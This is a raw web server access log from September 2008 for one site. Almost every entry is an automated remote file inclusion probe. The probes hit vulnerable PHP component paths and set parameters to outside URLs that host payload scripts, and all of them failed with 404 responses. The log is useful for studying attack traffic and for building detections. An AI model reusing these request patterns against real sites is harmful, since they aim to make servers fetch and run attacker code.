81.23.226.2 - - [04/Sep/2008:22:00:44 -0700] "GET /logs/access_080822.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.67" "jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:01:14 -0700] "GET /logs/access_080825.log//errors.php?error=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:03:05 -0700] "GET /logs/access.log//errors.php?error=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
64.72.112.223 - - [04/Sep/2008:22:03:07 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
64.72.112.223 - - [04/Sep/2008:22:03:07 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
64.72.112.223 - - [04/Sep/2008:22:03:07 -0700] "GET /logs/access_080812.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
64.72.112.223 - - [04/Sep/2008:22:03:47 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.jainvestigation.com"
64.72.112.223 - - [04/Sep/2008:22:03:47 -0700] "GET /logs/access_080825.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.jainvestigation.com"
64.72.112.223 - - [04/Sep/2008:22:03:47 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:04:06 -0700] "GET /logs/access_080822.log//include/write.php?dir=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
64.72.112.223 - - [04/Sep/2008:22:04:11 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.jainvestigation.com"
64.72.112.223 - - [04/Sep/2008:22:04:11 -0700] "GET /logs/access_080815.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.jainvestigation.com"
64.72.112.223 - - [04/Sep/2008:22:04:12 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:04:34 -0700] "GET /logs/access_080812.log//include/write.php?dir=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:04:41 -0700] "GET /logs//include/write.php?dir=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:04:41 -0700] "GET /logs/access_080728.log//include/write.php?dir=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:04:44 -0700] "GET //include/write.php?dir=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
64.72.112.223 - - [04/Sep/2008:22:07:14 -0700] "GET /logs/access_080812.log%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
82.194.86.185 - - [04/Sep/2008:22:08:10 -0700] "GET /errors.php?error=http://h1.ripway.com/bsb1/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:11:00 -0700] "GET /logs/access.log//include/write.php?dir=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
141.44.140.111 - - [04/Sep/2008:22:14:25 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jainvestigation.com"
141.44.140.111 - - [04/Sep/2008:22:14:29 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jainvestigation.com"
64.246.42.3 - - [04/Sep/2008:22:17:46 -0700] "GET /logs/access_080815.log/convert/mvcw.php?step=1&vwar_root=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.jainvestigation.com"
64.246.42.3 - - [04/Sep/2008:22:17:46 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.jainvestigation.com"
64.246.42.3 - - [04/Sep/2008:22:17:46 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.jainvestigation.com"
82.194.86.185 - - [04/Sep/2008:22:18:17 -0700] "GET /errors.php?error=http://h1.ripway.com/bsb1/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:18:20 -0700] "GET /logs/access_080825.log/errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:18:20 -0700] "GET /errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:18:20 -0700] "GET /logs/access_080825.log/errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:18:20 -0700] "GET /logs/access_080825.log/errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:18:20 -0700] "GET /logs/errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:18:21 -0700] "GET /errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:18:21 -0700] "GET /errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:18:21 -0700] "GET /logs/errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:18:21 -0700] "GET /logs/errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:19:40 -0700] "GET /logs/access_080825.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:19:40 -0700] "GET /logs/access_080825.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:19:40 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:19:41 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:19:41 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:19:41 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
64.246.42.3 - - [04/Sep/2008:22:20:45 -0700] "GET /logs/access_080728.log/convert/mvcw.php?step=1&vwar_root=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:22:30 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:22:30 -0700] "GET /logs/access_080825.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:22:30 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
82.194.86.185 - - [04/Sep/2008:22:24:11 -0700] "GET /logs/access_080825.log/errors.php?error=http://h1.ripway.com/bsb1/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jainvestigation.com"
82.194.86.185 - - [04/Sep/2008:22:24:11 -0700] "GET /errors.php?error=http://h1.ripway.com/bsb1/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jainvestigation.com"
82.194.86.185 - - [04/Sep/2008:22:24:12 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/bsb1/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:24:41 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:24:41 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:24:41 -0700] "GET /logs/access_080825.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:24:45 -0700] "GET /logs/access_080728.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:24:51 -0700] "GET /logs/access_080728.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:24:51 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:24:52 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:24:53 -0700] "GET /logs/access_080728.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:24:53 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:24:53 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:05 -0700] "GET /logs/access_080728.log/errors.php?error=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:06 -0700] "GET /errors.php?error=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:11 -0700] "GET /logs/errors.php?error=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:17 -0700] "GET /logs/access_080728.log/errors.php?error=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:17 -0700] "GET /errors.php?error=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:18 -0700] "GET /logs/errors.php?error=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:28 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:28 -0700] "GET /logs/access_080728.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:28 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:33 -0700] "GET /logs/access_080728.log/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:33 -0700] "GET /logs/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:25:33 -0700] "GET /errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
82.194.86.185 - - [04/Sep/2008:22:26:11 -0700] "GET /logs/access.log/errors.php?error=http://h1.ripway.com/bsb1/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:26:32 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:26:37 -0700] "GET /logs/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:26:38 -0700] "GET /logs/access_080728.log/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:26:38 -0700] "GET /errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:27:18 -0700] "GET /logs/access.log/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:27:46 -0700] "GET /logs/access_080728.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:27:54 -0700] "GET /logs/access.log/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:28:03 -0700] "GET /logs/access.log/errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:28:37 -0700] "GET /logs/access.log/errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.106.227.162 - - [04/Sep/2008:22:28:37 -0700] "GET /logs/access.log/errors.php?error=http://illugraf.de/components/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:28:10 -0700] "GET /logs/access_080728.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:28:11 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:28:11 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:28:14 -0700] "GET /logs/access_080728.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:28:28 -0700] "GET /logs/access_080728.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.218.85.18 - - [04/Sep/2008:22:29:17 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:29:16 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:31:16 -0700] "GET /logs/access_080825.log/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:32:13 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:32:26 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:32:32 -0700] "GET /logs/access.log/errors.php?error=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:32:46 -0700] "GET /logs/access_080815.log//ashnews.php?pathtoashnews=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:32:46 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:32:46 -0700] "GET //ashnews.php?pathtoashnews=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:32:52 -0700] "GET /logs/access.log/errors.php?error=http://www.ellinotopos.com/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:32:56 -0700] "GET /logs/access_080808.log//ashnews.php?pathtoashnews=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:32:56 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
203.152.41.4 - - [04/Sep/2008:22:32:56 -0700] "GET //ashnews.php?pathtoashnews=http://www.itm16.com/themes/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
66.199.244.42 - - [04/Sep/2008:22:34:40 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
74.6.18.222 - - [04/Sep/2008:22:34:49 -0700] "GET /logs/access_080705.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.jainvestigation.com"
216.180.251.34 - - [04/Sep/2008:22:35:52 -0700] "GET /logs/access_080825.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
216.180.251.34 - - [04/Sep/2008:22:36:26 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
216.180.251.34 - - [04/Sep/2008:22:35:53 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
216.180.251.34 - - [04/Sep/2008:22:35:58 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:37:34 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:39:36 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
209.250.238.63 - - [04/Sep/2008:22:40:15 -0700] "GET /logs/access_080812.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://goodscanid.thewomanizer.net/rfi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
209.250.238.63 - - [04/Sep/2008:22:40:15 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://goodscanid.thewomanizer.net/rfi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
209.250.238.63 - - [04/Sep/2008:22:40:15 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://goodscanid.thewomanizer.net/rfi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
209.97.201.206 - - [04/Sep/2008:22:40:20 -0700] "GET /logs/access.log/?sourcedir=http://www.nwstars.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
